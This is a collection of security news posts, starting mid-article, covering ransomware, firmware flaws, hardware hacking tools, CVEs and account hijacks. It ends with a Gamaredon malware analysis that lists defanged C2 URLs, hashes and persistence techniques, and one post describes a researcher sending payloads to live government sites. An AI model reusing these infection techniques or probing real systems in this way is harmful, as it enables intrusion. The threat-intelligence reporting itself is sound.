The volume of cyber threats is massive, especially since many hackers can automate the job. Unfortunately, these attacks are too much for humans to fight against alone. AI, however, is the best multitasker there is, able to find malicious threats instantly and alert humans or lock the attacker out.

2. Predict & Prevent

Part of the detection process is to predict activity before it can happen. The New York Police Department made one of the earliest implementations of predictive technology in 1995. Their software, CompStat, has philosophy and organization skills in mind. This predictive policing technique soon spread to other police stations across the United States.

Being high alert at all times is difficult, even for AI and other forms of automated software. By predicting threats, systems can create specific defenses before an attack takes place. With this technique, the system runs with as much efficiency as possible without sacrificing security, especially since there are measures in place at all times.

3. Encryption

While detecting a threat entering a system is fantastic, the goal is to make sure they can’t enter at all. Companies can build up walls of defense in many ways, one of those being camouflaging data completely. When information is moving from one source to another, it’s particularly susceptible to attacks and theft. Therefore, businesses need encryption along the way.

Encryption is merely changing the data to something that seems meaningless, like a code, which the system then decrypts on the other side.

Meanwhile, any hacker viewing the information will see random bits of text with no apparent meaning. Programs like iManage, which works with law firms and corporate legal departments, implement encryption as the first line of defense. 

4. Password Protection & Authentication

Passwords are the baseline of cybersecurity. While they’re so common that many hackers can bypass them easily, going without one is asking for someone to steal your data. Luckily, applying AI into the mix can make passwords more secure.

Before, a password was a word or phrase. In the modern era, words don’t cut it. Instead, companies use movements, patterns and biometrics to unlock information. Biometrics refers to using something unique to one’s body to open something, like retinal scans and fingerprints.

Apple’s iPhone X, for instance, uses a feature called Face ID, which scans your facial features with infrared sensors and turns that information into a password.

5. Multi-Factor Authentication

One thing better than having an incredibly good password is to have a lot of them. However, the multi-factor aspect changes how these codes work. Sometimes, being in a different location will require a user to enter a unique password. Paired up with the AI’s detection system, the characters can even change.

By allowing itself to be dynamic and working in real-time, access can modify itself in the event of an attack. Multi-factor doesn’t just create multiple walls of security but is also smart about who it lets in.

This system learns about the people entering into the network, making patterns of their behavior and habits to cross-reference with malicious content and determining their access privileges.

AI Changing Cybersecurity

AI technology can think for itself, more or less. It can detect patterns, find faults and even execute plans to fix issues. In the realm of cybersecurity, this system creates a whole new layer of protection. 

With the addition of artificial intelligence, the entire aspect of cybersecurity has changed forever and continues to evolve at a rapid pace. The more advances we reach, the more the field will change. A decade from now, we may not even recognize security features from when the internet first came about.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – artificial intelligence, sensitive information)

The post 5 Ways artificial intelligence Is Being Used to Keep Sensitive Information Secure appeared first on Security Affairs.

US CISA warns of Ransomware attacks impacting pipeline operations

The Cybersecurity and Infrastructure Security Agency (CISA) is warning critical U.S. infrastructure operators of a recent ransomware attack that affected a natural gas compression facility.

The Cybersecurity and Infrastructure Security Agency (CISA) issued an alert across critical U.S. infrastructure sectors about a recent infection at a natural gas compression facility.

“The Cybersecurity and Infrastructure Security Agency (CISA) responded to a cyberattack affecting control and communication assets on the operational technology (OT) network of a natural gas compression facility. A cyber threat actor used a Spearphishing Link [T1192] to obtain initial access to the organization’s information technology (IT) network before pivoting to its OT network.” reads the alert published by CISA. “The threat actor then deployed commodity ransomware to Encrypt Data for Impact [T1486] on both networks. Specific assets experiencing a Loss of Availability [T826] on the OT network included human machine interfaces (HMIs), data historians, and polling servers.”

Attackers initially launched a spear-phishing attack to infiltrate the target network, then pivoted to the OT network. This was possible because the victim failed to implement segmentation between the IT and OT networks. Then the attackers deployed ransomware that encrypted files on both IT and OT networks causing the “loss of availability” of human-machine interfaces (HMIs), data historians, and polling servers.

Once the networks have been infected with the ransomware, internal assets were no longer able to read and aggregate real-time operational data reported from low-level OT devices, causing a partial Loss of View for human operators.

According to the alerts, the infection did not impact any programmable logic controllers (PLCs) on the affected networks because the malware was designed to infect only Windows devices and the organization did not lose control of operations at any point during the attack.

In response to the incident, the target organization decided to implement a deliberate and controlled shutdown of the operations for approximately two days. The incident resulted in a Loss of Productivity and Revenue, after which normal operations resumed.

CISA alert provided planning and operational mitigation measures, as well as technical and architectural mitigations that should be implemented by organizations in critical infrastructure sectors to avoid similar ransomware attacks.

“The victim was able to obtain replacement equipment and load last-known-good configurations to facilitate the recovery process.” continues the report. “All OT assets directly impacted by the attack were limited to a single geographic facility.”

The targeted org was able to get replacement equipment following this ransomware incident and to load last-known-good configurations that made it easier to recover after the attack.

CISA officials confirmed that the threat actor has never obtained the ability to control or manipulate operations during the attack.

Although the attack had a limited direct impact on operations to one control facility, geographically distinct compression facilities also had to halt operations because of pipeline transmission dependencies. The cyberattack resulted in an operational shutdown of the entire pipeline asset for approximately two days.

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post US CISA warns of Ransomware attacks impacting pipeline operations appeared first on Security Affairs.

Unsigned Firmware running on peripherals could expose Windows, Linux systems to hack

Peripheral devices with unsigned firmware can expose Windows and Linux machines to hack, warn experts from firmware security firm Eclypsium.

Experts at firmware security firm Eclypsium have discovered that many peripheral device manufacturers have not implemented security checks to prevent the installation of firmware from an untrusted source.

An attacker could exploit the lack of checks to execute malicious firmware and perform malicious actions on both Windows and Linux systems, such as the installation of persistent backdoors.

“The problem is that peripheral devices often lack the same security best practices that we take for granted in operating systems and in other more visible components, like the UEFI or BIOS.” reads the post published by Eclypsium.

“Many peripheral devices do not verify that firmware is properly signed with a high quality public/private key before running the code. This means that these components have no way to validate that the firmware loaded by the device is authentic and should be trusted. An attacker could simply insert a malicious or vulnerable firmware image, which the component would blindly trust and run.”

Experts highlighted that attackers could tamper the firmware of devices, such as network cards, drives, and other peripherals, to remotely control them or for sabotage.

This kind of attack is not theoretical, the NSA-linked APT group Equation Group used these techniques to compromise the firmware on hard drives.

The researchers analyzed the flaws in four types of peripheral firmware for touchpads/trackpads, cameras, WiFi adapters, and USB hubs.

Peripheral devices don’t implement mechanisms to validate that the firmware loaded by the device is authentic, this means that an attacker could simply insert a malicious or vulnerable firmware image, which the component would run.

Attackers can plant malicious firmware on a network adapter to intercept or alter traffic or hack into PCI devices to carry out DMA attacks.

Eclypsium has found security issues in the touchpad and TrackPoint firmware used in Lenovo laptops, in the HP Wide Vision FHD (Sunplus) camera on an HP laptops, in the WiFi adapter installed on a Dell XPS laptop, and a VLI USB hub.

The experts also published a video PoC of an attack on a network interface, a Broadcom chipset, that runs an unsigned firmware.

“A malicious attack on a NIC can have a profound impact on the server, compromising the operating system remotely, providing a remote backdoor, snooping and exfiltrating raw network traffic and bypassing operating system firewalls to extract data or deliver ransomware.” reads the analysis published by the experts. “Such an attack could disconnect a server from a network upon a signal, disrupting connectivity for an entire data center,”

The attack chain demonstrated by the experts sees the attackers initially delivering a piece of malware to the targeted machine via email, a malicious website or an evil maid attack. The malware act as an attack vector used to load the tainted firmware onto a peripheral device that is not able to validate its origin and authenticity.

Experts pointed out that the difficulty in carrying out the attack depends on specific devices. For some devices, the firmware could be updated by unprivileged users, such as the case of the Sunplus webcam firmware.

The experts pointed out that on Linux and Windows it is necessary to implement a mechanism to verify the firmware signature before an update, while Apple devices mitigate implements a verification of the signature of the files in a driver package, including the firmware, every time it’s loaded on a device.

“The issue of unsigned firmware in peripheral devices is a widespread problem affecting a broad spectrum of brands and their ODM suppliers.” concludes the report. “Unsigned firmware in peripheral devices remains a highly overlooked aspect of cybersecurity. Depending on the capabilities of the component, unsigned firmware can lead to the loss of data, integrity, and privacy, and can allow attackers to gain privileges and hide from traditional security controls. Given the widespread nature of unsigned firmware, enterprises should scan their devices for any vulnerable components, and should assess the firmware posture of new devices during procurement.”

Pierluigi Paganini

(SecurityAffairs – unsigned firmware, hacking)

The post Unsigned Firmware running on peripherals could expose Windows, Linux systems to hack appeared first on Security Affairs.

Hacking IoT devices with Focaccia-Board: A Multipurpose Breakout Board to hack hardware in a clean and easy way!

Go grab a copy of the Gerbers and 3D-printed Case STL files at https://github.com/whid-injector/Focaccia-Board and print through your favorite FAB.

Prologue

Even before the appearance of the word (I)IoT, I was breaking hardware devices, as many of you, with a multitude of debuggers (i.e. stlink, jlink, RS23–2-2USB, etc.). It was always a PITA bringing around a device that does UART-to-USB, another that supports JTAG or SWD, a SPI reader/dumper, etc.

Luckily for all of us, FTDI released the lovely FT232H chipset which does support all of them in one-single-chip. Hurray!

One of the cheapest boards embedding the FT232H on the market is the FT232H CJMCU, which cost less than 10 EUR!

Focaccia Board
FT232 CJMCU (Easily available on ebay, amazon or Aliexpress)

Though, there was still a couple of drawbacks:

  • Every-time I had to remember which Pin was doing what. For each of the protocols! (i.e. UART, JTAG, SWD, I2C, SPI).
  • There were not Pull-Up resistors on the PCB.
  • Some Pins used for a protocol have to be short-circuited to operate with other protocols (i.e. I2C or SWD).
  • Too many flying cables when you need to connect to some testing DuPont wires (example below).
Focaccia Board
DIY breadboard to keep flying cables more in order.

During last Xmas holidays I thought: “That’s enough, I am done. I need a proper breakout that will save my time”. And that’s how Focaccia-Board came to life!

Focaccia Board
Assembled Focaccia-Board

Main Features:

  • Easy to access Pins for all supported protocols: UART, SPI, I2C, JTAG, SWD.
  • Voltage Selector to easily switch from 3.3V to 5V.
  • Support for SOP8/SOP16 Clips (in order to dump SPI Flashes without desoldering them from the target device)
  • Support for SOP8/SOP16 sockets adapters.
  • A multi-purpose breadboard-like set of pin headers/sockets and terminal blocks to help you dealing with flying cables (i.e. lower part of the PCB). Note: this is not wired with the FT232H anyhow, is up to you.

Some Practical Use-Cases

Focaccia-Board Vs Fingbox (UART):

Last year you may remember me disclosing this lovely bug in FingBox ( a super-duper IoT Security Appliance that is supposed to protect your LAN-connected devices from attackers):

In this first use-case, I used Focaccia-Board (from now on a.k.a. F-B) for debugging the UART console, which was easily accessible on the FingBox’s PCB.

Focaccia Board

As showed below the Uboot output was easily available and lead to enough insights to discover the way to get root.

Focaccia Board

Focaccia-Board Vs WinkHub (JTAG):

The next use-case is showing how to easily connect to the target device over JTAG in order to live-debug or even dump the entire flash memory.

Focaccia Board
Focaccia-Board connected to the WinkHub’s JTAG.

Once identified the correct JTAG Pinout (i.e. TDI, TDO, TMS, TCK, etc…) and the correct OpenOCD’s config files for both F-B* and the target device, we can run it with the command: 

sudo openocd -f ft232h_jtag-swd.config -f target_device.cfg

*The right config file for F-B is in its Github repo.

Focaccia Board
Focaccia-Board’s JTAG successfully attached to WinkHub.

Focaccia-Board Vs WHID Injector (SPI Dump):

This time you will see how easy is to use F-B to conduct some Forensics against a Weaponized Mouse containing my beloved WHID-Injector.

Focaccia Board
Weaponized Mouse with WHID-Injector and USB HUB.

Once obtained the suspicious mouse and confirmed it was weaponized, I proceeded in identifying the SPI flash and removing it from the PCB.

Focaccia Board

Next step was to use the SOP8 socket on the Focaccia-Board to dump the SPI Flash content.

Focaccia Board

In order to dump the Flash content you have to fire the following command: 

flashrom -p ft2232_spi:type=232H -r spi_dump.bin

(Reminder: In case of Forensics acquistion is always recommended to acquire the Flash content with the WP (Write Protect) Pin disabled (see jumper on the PCB) thus we are 100% that the content of the Flash will not be modified during the operation. And therefore sure that is forensically acceptable as evidence.

Of course we can also use a SOP8 Clip to dump it.

Focaccia Board

And here the results of the dump and some initial Forensics analysis of it. As you see plenty of artifacts left-over by the attacker.

Focaccia Board
SPI dump and Forensics Analysis of it.

In some cases is also possible to dump a SPI Flash directly from the PCB of the target device (though, is discouraged, unless you manage to keep the target’s CPU in a reset state and thus unable to talk with the SPI Flash itself).

Focaccia Board
Example of SPI dump with SOP16 clip directly from the target’s PCB.

Focaccia-Board Vs Smartlock (Multi-purpose Breadboard):

At last, an example of how to use the lower part of F-B’s set of pin headers/sockets & terminal blocks against a smartlock during some forensics investigation scenario.

Focaccia Board
Smartlock
connected to its debugger through the F-B’s
breadboard

In this case, the FT232H is not involved. I just used the lower part of F-B’s PCB to connect those ugly flying cables that were non-standard DuPont wires.

Focaccia Board
Successfully dumped the smartlock’s firmware.

And after having successfully dumped the firmware we can proceed at extracting some valuable evidences for the forensics case.

Focaccia Board
Artifacts extracted from the FW analysis: Smartlock Passwords & User’s Logs.

Overall

Focaccia-Board is nothing extraordinary. But it saves my time while hacking (I)IoT targets. And that’s enough to be considered a valuable asset in my lab. 🙂 Hope you will enjoy it too!

P.S. I am going to ask WHID-Injector & WHID-Elite manufacturer if interested to bring it to life at the usual affordable price for the folks out there that have no time or capabilities to print the PCB themselves.

#StayTuned & Follow @whid-injector on Twitter!

Focaccia Board

The original post is available in Medium:

https://medium.com/@LucaBongiorni/hacking-iot-devices-with-focaccia-board-8c4e009ed488

About the author: Luca Bongiorni

Luca is working as Principal Offensive Security Engineer and in his spare time is involved in InfoSec where the main fields of research are: Radio Networks, Hardware Reverse Engineering, Hardware Hacking, Internet of Things and Physical Security. He also loves to share his knowledge and present some cool projects at security conferences around the globe. At the moment is focusing his researches on bypassing biometric access control systems, ICS Security and Air-Gapped Environments.

Pierluigi Paganini

(SecurityAffairs – hacking IoT, Focaccia board)

The post Hacking IoT devices with Focaccia-Board: A Multipurpose Breakout Board to hack hardware in a clean and easy way! appeared first on Security Affairs.

CVE-2019-0604 SharePoint Remote code execution (RCE) vulnerability

A security expert found a flaw in SharePoint that could be exploited to remotely execute arbitrary code by sending a specially crafted SharePoint application package.

Summary:
A few days ago I saw a post from Alienvault which says attackers are still exploiting SharePoint vulnerability to attack Middle East government organization. Having said that I found Income Tax Department India and MIT Sloan was also vulnerable to CVE-2019-0604 a remote code execution vulnerability which exists in Microsoft SharePoint. A malicious actor could exploit this vulnerability by simply sending a specially crafted SharePoint application package.

Technical analysis:
I found this vulnerability during my free time while I was browsing to ZoomEye to find such component. The application (incometaxindia.gov.in) was found to be vulnerable as it was using SharePoint as a technology to host its service. To verify this I’ve sent a crafted payload which enable the remote server (incometaxindia.gov.in) to perform a DNS lookup on my burp collaborator. You can do this manual by sending the crafted XML payload or via desharialize.

Aside, MIT Sloan School of Management was also found to be vulnerable with CVE-2019-0604.

CVE-2019-0604

Responsible Disclosure:
CERT-In (IncomeTaxIndia)
This was sent to CERT-In on Feb 12, 2020, got initial response by them on Feb 13, 2020. Post that the vulnerability was patch silently.
For MIT:
This was sent to MIT security team on Feb 13, 2020, got initial response by them on Feb 14, 2020. Post that the vulnerability was patch silently on Feb 15, 2020.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original post at:

https://www.inputzero.io/2020/02/sharepoint-rce.html

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2019-0604)

The post CVE-2019-0604 SharePoint Remote code execution (RCE) vulnerability appeared first on Security Affairs.

Flaw in WordPress ThemeGrill Demo Importer WordPress theme plugin expose 200K+ sites to hack

A serious flaw in the ThemeGrill Demo Importer WordPress theme plugin with over 200,000 active installs can be exploited to wipe sites and gain admin access to the site.

Experts from the security firm WebARX have discovered a serious flaw in the WordPress theme plugin ThemeGrill Demo Importer with over 200,000 active installs. The vulnerability could be exploited to wipe sites running the vulnerable versions of the plugin and gain admin access to the site.

ThemeGrill Demo Importer is a popular plugin that allows WordPress website administrators to import demo content, widgets and settings for ThemeGrill theme plugin with just one click.

The critical flaw, that existed for the past three years, affects versions 1.3.4 through 1.6.1 of the plugin and could be exploited only against those websites where the ThemeGrill theme plugin is activated.

Once the attackers have exploited the vulnerability, the database will be populated with default settings and data. If the database includes a user named “admin,” the exploitation of the flaw will allow the attacker to automatically log-in as an administrator.

“The prerequisite is that there must be a theme installed and activated that was published by ThemeGrill.” reads the analysis published by WebARX. “In order to be automatically logged in as an administrator, there must be a user called “admin” in the database. Regardless of this condition, the database will still be wiped to its default state.”

The bad news is that the exploitation of the issued that affects the ThemeGrill plugin can be automated.

The development team behind the ThemeGrill addressed the flaw with the release of version 1.6.2.

Below the timeline for the vulnerability:

  • 06-02-2020 – Discovery of the issue and released a patch to all WebARX customers.
  • 06-02-2020 – Reported the issue to the developer of the plugin.
  • 11-02-2020 – Second attempt to reach out to the developer.
  • 14-02-2020 – Received email from developer, resent the issue to them.
  • 16-02-2020 – Developer published a new version which fixes the issue.

Recently the issues in other two WordPress plugins made the headlines:

  • Jan. 2020 – An authentication bypass vulnerability in the InfiniteWP plugin that could potentially impact by more than 300,000 sites.
  • Jan. 2020 – Over 200K WordPress sites are exposed to attacks due to a high severity cross-site request forgery (CSRF) bug in Code Snippets plugin.
  • Feb. 2020 – A stored cross-site vulnerability in the GDPR Cookie Consent plugin that could potentially impact 700K users.

Pierluigi Paganini

(SecurityAffairs – hacking, WordPress)

The post Flaw in WordPress ThemeGrill Demo Importer WordPress theme plugin expose 200K+ sites to hack appeared first on Security Affairs.

FC Barcelona and the International Olympic Committee Twitter accounts hacked

The popular hacker group OurMine has hacked the official Twitter account of the FC Barcelona, along with the accounts of Olympics and the International Olympic Committee (IOC).

The popular hacker group has hacked the official Twitter account of the FC Barcelona, along with the accounts of and the International Olympic Committee (IOC).

On Saturday, the popular hacker collective Ourmine has hijacked the official Twitter accounts of FC Barcelona, the Olympics and the International Olympic Committee (IOC). This is the second time that the Barcelona FC has lost the control of its account, in 2017, the Spanish team had both its Facebook and Twitter accounts defaced by the same hacker group.

The hackers hijacked the official Barcelona and Olympic Twitter accounts and posted some tweets to claim responsibility for the hack.

“Hi, we are OurMine,” states the tweet from the Barcelona account. “Wel, we read some private messages and it look like Neymar will back here.”

The hackers also shared an email address where they can be contacted to request support for improving the security of the victims’ accounts.

The incident was confirmed by the Barcelona FC and by the International Olympic Committee.

A Twitter spokesperson confirmed to Business Insider that both the Olympics and FC Barcelona accounts were hacked by a group called OurMine and through a “third-party platform.” 

“As soon as we were made aware of the issue, we locked the compromised accounts and are working closely with our partners to restore them,” a Twitter spokesperson confirmed to Business Insider. 

“The IOC can confirm that it is investigating a potential breach into some of its social accounts,” read a statement from a spokesperson for the International Olympic Committee. 

The Business Insider speculates the hack occurred via a third-party platform.

“In an email to Business Insider, OurMine confirmed it was behind the cyberattacks against both FC Barcelona and the Olympics. The group, which it said consisted of 5 people, told Business Insider it chooses its targets at random.” continues the Business Insider. “It confirmed it used a third-party app to access the accounts.”

Immediately after the hack, Twitter locked both accounts.

OurMine is back after a period of silence, earlier this year the group hijacked the official Twitter accounts of 15 NFL teams and the league itself. Last week the group also hacked the Twitter and Instagram accounts for Facebook and Messenger.

To secure your social media account enable two-factor authentication (2FA) when it is implemented by the service.

Pierluigi Paganini

(SecurityAffairs – hacking, Barcelona FC)

The post FC Barcelona and the International Olympic Committee Twitter accounts hacked appeared first on Security Affairs.

Russian govn blocked Tutanova service in Russia to stop encrypted communication

Tutanota, the popular free and open-source end-to-end encrypted email software, has been blocked by Russian authorities.

The popular free and open-source end-to-end encrypted email service Tutanota has been blocked in Russia on Friday evening. Since early February, the Russian government has blocked other encrypted email and VPN services in Russia, including ProtonMail and ProtonVPN VPN service.

Tutanota is listed in the registry of blocked sites provided by Russian activists.

Roskomnadzor explained that the services were abused by cybercriminals and some of the blocked companies refused to register their services with state authorities. The Russian government asks all Internet service providers and VPN providers operating in the country to provide information about their users.

As of March 2017, Tutanota’s owners claimed to have over 2 million users of the product.

The blockage of the Tutanota service has been verified by the OONI Explorer, an open data resource on internet censorship around the world.

Tutanota is disappointed of the block and explained that the decision of the Kremlin is an act against encryption and confidential communication in Russia.

“Tutanota focuses on providing a secure and confidential communication channel to citizens, but also to journalists and activists.” states Tutanota.

“Encrypted communication is a thorn in the side to authoritarian governments like Russia as encryption makes it impossible for security services to eavesdrop on their citizens. The current blocking of Tutanota is an act against encryption and confidential communication in Russia.”

People who need secure communication in Russia and in other countries where the Tutanota service has been blocked, such as Egypt, can still access Tutanota by using the Tor browser or a VPN.

“We condemn the blocking of Tutanota. It is a form of censorship of Russian citizens who are now deprived of yet another secure communication channel online”, says Matthias Pfau, co-founder of Tutanota. “At Tutanota we fight for our users’ right to privacy online, also, and particularly, in authoritarian countries such as Russia and Egypt.”

On Thursday, a court in Moscow fined Twitter and Facebook 4 million rubles (roughly $63,000) each for refusing to store the personal data of Russian citizens on servers that are located in Russia. According to the media, these are the largest penalties imposed by the Kremlin on Western IT firms under internet use laws since 2012.

“The fines of nearly $63,000 are the first five-figure fines levied on tech companies since Russia adopted a flurry of legislation starting in 2012 designed to tighten the government’s grip on online activity.” reported the Associated Press.

Roskomnadzor is attempting to oblige the IT giants, including Facebook, Twitter, and Google to move data related to Russian citizens to servers in Russia allowing the Government to monitor them.,

Roskomnadzor pointed out that the fines are the only anticipation of further penalties for both companies that would be fined 18 million rubles ($283,000) each if they don’t comply this year.

The Russian government could also ban IT companies that will not comply with the same law.

Pierluigi Paganini

(SecurityAffairs – Tutanova, Russia)

The post Russian govn blocked Tutanova service in Russia to stop encrypted communication appeared first on Security Affairs.

Launching the First “Yomi Hunting” Challenge!

About a year ago, Yoroi released the Yomi Hunter sandbox, today, they love to challenge the malware community with the first “Yomi Hunting” contest.

About a year ago, we publicly released the Yomi Hunter sandbox for a few simple reasons: in Yoroi we believe in the InfoSec community value, we think it plays a central role in the fight of cyber-threats and we feel the need to support it. 

Our sentiment regarding the InfoSec community led us to support the Italian CTF team in their path to the final round of the European Cyber Security Challenge tournament last year. But, we also love to create things, so we were the first Italian Private Company launching and maintaining a public instance of the sandbox technology we developed across the years. 

It was natural for us to try to give back something to the community we believe in, concretely.

Today is different. 

Today, we’d love to challenge the malware community with the first “Yomi Hunting” contest. Literally, a malware and threat hunting contest with a simple and straightforward goal: hunt the bad guys.

So we are inviting malware analysts, security professionals and community researchers to feed the Yomi boxes with good malware, to stay in touch with the Yoroi twitter account to work with us and the other good guys.  

Of course, as every contest, “Yomi Hunting” has some cool prizes too, such as the possibility of the publication of a joint malware research with our Z-LAB, along with awards and other fun stuff we will ship to the most active researchers participating in the contest.

Well, how to participate?

It’s quite simple: Just go to the Yomi Hunter registration page, create a free community accountsubmit interesting samples and get in touch with us on our socials and share your findings! Or just include the “#yomihunter” hashtag to your tweets.

How it works?

The contest will start on 17 February 2020 and will end on 31 March 2020. At the end of the contest the three most active researchers submitting more samples will be rewarded with:

  1. First prize: backpack, shirt, agenda and gadgets
  2. Second place: shirt, agenda and gadgets
  3. Third place: agenda and gadgets

Every participant can monitor the chart through the Yomi Hunter “Wall of Fame” here.

Happy Hunting!

Pierluigi Paganini

(SecurityAffairs – hacking, Yomi)

The post Launching the First “Yomi Hunting” Challenge! appeared first on Security Affairs.

Cyberwarfare: A deep dive into the latest Gamaredon Espionage Campaign

Security experts from Yoroy-Cybaze ZLab have conducted a detailed analysis of an implant used by the Gamaredon APT group in a recent campaign.

Introduction 

Gamaredon Group is a Cyber Espionage persistent operation attributed to Russians FSB (Federal Security Service) in a long-term military and geo-political confrontation against the Ukrainian government and more in general against the Ukrainian military power. 

Gamaredon has been active since 2014, and during this time, the modus operandi has remained almost the same. The most used malware implant is dubbed Pteranodon or Pterodo and consists of a multistage backdoor designed to collect sensitive information or maintaining access on compromised machines. It is distributed in a spear-phishing campaign with a weaponized office document that appears to be designed to lure military personnel. 

In recent months, Ukrainian CERT (CERT-UA) reported an intensification of Gamaredon Cyberattacks against military targets. The new wave dates back to the end of November 2019 and was first analyzed by Vitali Kremez. Starting from those findings, Cybaze-Yoroi ZLab team decided to deep dive into a technical analysis of the latest Pterodo implant.

Technical Analysis

The complex infection chain begins with a weaponized Office document named “f.doc”. In the following table the initial malware information is provided.

Hash76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a
ThreatGamaredon Pteranodon weaponized document
Brief DescriptionDoc file weaponized with Exploit
Ssdeep768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir:uG1aKQ5OwCrItq3TgGfLt9r

Table 1. Information about initial dropper

The decoy document is written using the ukrainian language mixed to many special chars aimed to lure the target to click on it, and, once opened, it appears as in the following figure.

Figure 1. Overview of the document

The document leverages the common exploit aka CVE-2017-0199 and tries to download a second stage from “hxxp://win-apu.]ddns.]net/apu.]dot”.

Figure 2. URL used by document to download the second stage

Thanks to this  exploit (Remote Code Execution exploit) the user interaction is not required, in fact the “enable macro” button is not shown. The downloaded document has a “.dot” extension, used by Microsoft Office to save templates for different documents with similar formats. Basic Information on the “.dot” file are provided:

Hashe2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8
ThreatGamaredon Pteranodon loader dot file
Brief DescriptionDot file enabling the infection of the Gamaredon Pteranodon
Ssdeep768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ:oI8XoWruHpp/P4

Table 2. Information about second stage

If we decide to open the document, we see that the document is empty, but it requires the enabling of the macro.

Figure 3. Overview of the second stage document

The body of the macro can be logically divided into two distinct parts: 

  • The first one is the setting of the registry key “HKEY_CURRENT_USER\Software\Microsoft\Office\” & Application.Version & _”\Word\Security\” and the declaration of some other variables, such as the dropurl “get-icons.]ddns.net”;
  • The second one is the setting of the persistence mechanism through the writing of the vbs code in the Startup folder with name “templates.vbs”. This vbs is properly the macro executed by the macro engine of word
Figure 4. Code of the “template.vbs” stored in the Startup folder

The evidence of the written file in the Startup folder:

Figure 5. Evidence of the “template.vbs” file in the Startup folder

Analyzing the content of “templates.vbs” it is possible to notice that it define a variable containing a URL like “hxxp://get-icons.]ddns.]net/ADMIN-PC_E42CAF54//autoindex.]php” obtained from “hxp://get-icons.]ddns.]net/” & NlnQCJG & “_” & uRDEJCn & “//autoindex.]php”, where “NlnQCJG” is the name that identifies the computer on the network and “uRDEJCn” is the serial number of drive in hexadecimal encoding. From this URL it tries to download another stage then storing it into “C:\Users\admin\AppData\Roaming\” path with random name. At the end, “templates.vbs” script will force the machine to reboot. 

Figure 6. Function used to force machine reboot

The dropped sample is an SFX archive, like the tradition of Gamaredon implants.

Hashc1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f
ThreatGamaredon Pteranodon implant SFX archive
Brief DescriptionSFX Archive First Stage 
Ssdeep24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv:zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv

Table 3. Information about first SFX archive

By simply opening the SFX archive, it is possible to notice two different files that are shown below and named respectively “8957.cmd” and “28847”. 

Figure 7. Content of the Gamaredon Pteranodon  SFX archive

When executed, the SFX archive will be extracted and the “8957.cmd” will be run. The batch script looks like the following screen:

Figure 8. Bat script source code (with junk instructions)

It contains several junk instructions with the attemption to make the analysis harder. Cleaning the script we obtain:

Figure 9. Batch script source code (cleaned)

At this point, the batch script renames the “28847” file in “28847.exe”, opens it using “pfljk,fkbcerbgblfhs” as password and the file contained inside the “28847.exe” file will be renamed in “WuaucltIC.exe”. Finally, it will be run using “-post.php” as argument.

The fact that the “28847.exe” file can be opened makes us understand that  the “28847” file is another SFX file. Some static information about SFX are:

Hash3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1
ThreatGamaredon Pteranodon implant SFX archive
Brief DescriptionSFX Archive Second Stage
Ssdeep24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM:OoZwxVvfoaPu

Table 4. Information about the second SFX archive

Exploring it, it is possible to see several files inside of it,  as well as the 6323 file. The following figure shows a complete list.

Figure 10. Content of the second SFX archive

In this case, the SFX archive contains 8 files: five of them are legit DLLs used by the “6323” executable to interoperate with the OLE format defined and used by Microsoft Office. The “ExcelMyMacros.txt” and “wordMacros.txt” files contain further macro script, described next. So, static analysis on the “6323” file shown as its nature: it is written using Microsoft Visual Studio .NET, therefore easily to reverse. Before reversing the executable, it is possible to clean it allowing the size reduction and the junk instruction reduction inside the code. The below image shows the information about the sample before and after the cleaning. 

Figure 11. Static information about .NET sample before and after the cleaning

The source code looks as follows. 

Figure 12. Part of .NET sample source code

The first check performed is on the arguments: if the arguments length is equal to zero, the malware terminates the execution. After that, the malware checks if the existence of the files “ExcelMyMacros.txt” and “wordMacros.txt” in the same path where it is executed: if true then it reads their contents otherwise it will exit. 

Figure 13. Function used by .NET sample to check the presence of the “WordMacros.txt” and the “ExcelMyMacros.txt” files”

Part of the content of the variable “xVGlMEP”:

Figure 14.Piece of the “WordMacros.txt” code

There is a thin difference between the two files. 

Figure 15. Difference between “WordMacros.txt” and  “ExcelMyMacros.txt” files”

As visible in the previous figure, the only difference between the files are in the variable, registry key and path used by Word rather than by Excel. Finally the macros are executed using the Office engine like in the following figure. 

Figure 16. Winword with malicious macro

So let’s start to dissect the macros. For a better comprehension we will be considering only one macro and in the specific case we will analyze “wordMacros.txt”  ones. First of all the macro will set the registry key “HKEY_CURRENT_USER\Software\Microsoft\Office\” & Application.Version & _”\Word\Security\” and then will set up two scheduled tasks that will start respectively every 12 and 15 minutes: the first one will run a “IndexOffice.vbs” in the path “%APPDATA%\Microsoft\Office\” and the second one will run “IndexOffice.exe” in the same path. 

Figure 17. Registry keys and Scheduled tasks set by malware

Finally, the malware will write the “IndexOffice.txt” file in the  “%APPDATA%\Microsoft\Office\” path. The following figure shows what has been previously described:

Figure 18. Part of “IndexOffice.txt” file

The script will check the presence of the  “IndexOffice.exe” artifact: if true then it will delete it and it will download a new file/script from “hxxp://masseffect.]space/<PC_Name>_<Hex_Drive_SN>/post.]php”. 

Figure 19. Domain “masseffect.]space” declaration and use of the Encode function

The malware tries to save the C2 response and encoding it using Encode function. This function accepts three parameters: the input file, the output file and the arrKey; arrKey is calculated thanks to  GetKey function that accepts as input the Hexadecimal value of the Driver SN installed on the machine and returns the key as results. Part of Encode function and complete code of GetKey function are shown below.

Figure 20. Encode function 
Figure 21. Function GetKey

Visiting the web page relative to C2, it shows a “Forbidden message” so this means that the domain is still active but refuses incoming requests.

Figure 22. Browser view of the URL “masseffect.]space” 

Conclusion

Gamaredon cyberwarfare operations against Ukraine are still active. This technical analysis reveals that the modus operandi of the Group has remained almost identical over the years. 

